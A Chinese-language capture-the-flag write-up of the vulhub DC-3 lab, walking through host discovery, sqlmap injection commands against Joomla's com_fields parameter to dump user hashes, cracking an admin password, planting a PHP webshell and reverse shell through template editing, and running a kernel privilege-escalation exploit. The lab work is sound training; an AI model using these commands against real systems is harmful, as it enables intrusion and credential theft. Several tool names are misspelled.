vulhub靶场 DC-3 复现学习及细节解析

啰嗦两句：

提权之前完成是一个月前做的，当时在提权处出了点问题就搁置了，今天才完成，所以IP地址可能会会有变化

注意：后续出现的IP地址为192.168.200.55同样是靶机IP地址，若本文能有帮助到你的地方，不胜荣幸。

一、搭建环境

1.工具

攻击机：kali（192.168.200.14）

靶机：DC-3 (暂时未知)

2.注意

攻击机和靶机的网络连接方式要相同，另外DC-1的网络连接方式我这里采用NAT模式，是与kali的网络连接模式相同的（当然亦可以选用桥接模式）

DC-1网络设计

点击高级后可以查看DC-1的靶机MAC地址，便于扫描IP时识别

二、信息收集

1.扫描同网段下的存活主机方法

靶机dc-3的MAC地址，根据MAC地址判断IP地址

1703640637_658b7e3d278e54a7bf19e.png!small?1703640638795

其一：

arp-scan -l

1703640647_658b7e4766569da45725e.png!small?1703640648995

其二：

nmap -sP 192.168.200.0/24 -T4

1703640655_658b7e4fac5e6ad76fe16.png!small?1703640657335

其三：

natdiscover

1703640665_658b7e59d98f2619c403b.png!small?1703640667344

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.8
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

1703640673_658b7e61336f9d5b41ba3.png!small?1703640674664

可以看到此站点，只开启了80端口

3.扫描后台目录

利用dirsearch工具，可与看到administrator这个目录，应该是后台

1703640680_658b7e6840ed00a4c933f.png!small?1703640681758

4.指纹收集

登录网站

一个著名的CMS系统

1703640687_658b7e6fd4f7e0aff4af7.png!small?1703640689315

左侧的英文翻译为：

这一次，只有1个flag，一个切入点，没有任何线索。要获得该标志，您显然必须获得root权限（提权）。你如何成为根取决于你——显然，还有系统。祝你好运，我希望你喜欢这个小挑战。

使用joomscan进行扫描

joomscan -u http://192.168.200.8/

joomscan 安装方法

sudo apt-get install joomscan

1703640729_658b7e9926b536855b8b9.png!small?1703640730688

一般的：可以根据框架版本去百度搜索它相关的漏洞，先登录后台目录

1703640736_658b7ea08fa60b0f5ba16.png!small?1703640738031

百度搜索后，可以发现千篇一律的sql漏洞

1703640743_658b7ea7a3ef5e0f3fbe3.png!small?1703640745227

利用KILI工具查找漏洞

1703640753_658b7eb139b88e6709424.png!small?1703640754681

查看文件

1703640760_658b7eb8d7c87faf5a3c3.png!small?1703640762219

5.后台爆破

1703640772_658b7ec4e114d90010881.png!small?1703640774527

sqlmap列出数据库库名

sqlmap -u "http://192.168.200.8/index.php ?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

根据提供的SQLmap构建的payload

1703640782_658b7ece1618074b12a9d.png!small?1703640783779

sqlmap列出数据库joomladb下的所有表名

sqlmap -u "http://192.168.200.8/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

1703640791_658b7ed71112ece164005.png!small?1703640792740

发现#_users表

列出users表的字段类型

sqlmap -u "http://192.168.200.8/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

#__users 里的信息

1703640801_658b7ee18aaf66826bd01.png!small?1703640803007

确定账户名账号密码一般为“username,password”

爆数据

sqlmap -u "http://192.168.200.8/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump

1703640809_658b7ee9aa5af13fdd3ea.png!small?1703640811566

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #哈希加密

使用kali中的join工具进行解密

vi admin.txt      #编辑 将密文写入
john admin.txt    #破解

1703640816_658b7ef04052dd387a564.png!small?1703640817933

破解后得到登录密码为：snoopy 账号：admin

登录后台

1703640826_658b7efa0537f518d242b.png!small?1703640827467

三、漏洞探测

上传Webshell

可以找到网站源码，而模板里的php文件可编辑。

1703640833_658b7f01aa455dfc74fda.png!small?1703640835328

Joomla后台可编辑模板，利用这个功能，在template下面创建一个 test.php，写入一句话，蚁剑成功连接

1703640841_658b7f095e2c39093c795.png!small?1703640842903

1703640848_658b7f10878b061f60333.png!small?1703640850148

1703640855_658b7f1751aa994701a10.png!small?1703640856993

当时上传一句话木马的路径如下，此时是可以浏览网站目录和打开虚拟终端的。

1703640863_658b7f1fb24a22dd98fa3.png!small?1703640865178

1703640914_658b7f527135a06292d59.png!small?1703640915885

模板问及那所在路径（直接访问当前文件夹，均可以获取当前文件夹的内容）

http://192.168.200.8/templates/beez3/html/

1703640921_658b7f599ad2b5a170351.png!small?1703640923068

反弹shell

在/templates/beez3模板里上传一个反弹shell的文件，记住上传路径，文件由自己创建，本文的文件名shell.php

1703640932_658b7f64a1664cf5f2b4a.png!small?1703640934290

反弹shell成功

1703640939_658b7f6b6cb93a27b0de9.png!small?1703640940960

利用EXP

用 searchsploit工具 查找Ubuntu 16.04的提权，发现一个“拒绝服务漏洞”，可以用来提权

searchsploit ubuntu 16.04

1703640946_658b7f727236579ec88f2.png!small?1703640948132

查看漏洞，下载EXP

cp /usr/share/exploitdb/exploits/linux/local/39772.txt  shell.txt
cat shelll.txt

文件内容提供了EXP网址

1703640954_658b7f7a09331fe5f43bf.png!small?1703640955482

下载（这步在靶机中实现，这步骤操作失误）

1703640962_658b7f82b6352d5a0f7df.png!small?1703640964580

解压文件

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

1703640974_658b7f8e0593027fee393.png!small?1703640975610

1703640979_658b7f936134c610c10e9.png!small?1703640980764

1703640984_658b7f98d63942832e959.png!small?1703640986594

提权

编译代码

./compile.sh   #执行脚本，编译文件

1703640992_658b7fa04ad98dfccecb1.png!small?1703640993742

提权，获取root权限

./doubleput  #执行提权文件

略微等待一会儿

1703641000_658b7fa87e263a4753648.png!small?1703641002105

1703641007_658b7faf9db5635391167.png!small?1703641009165

文章参考： https://blog.csdn.net/weixin_43583637/article/details/101554815

长亭百川云 - 文章详情

长亭百川云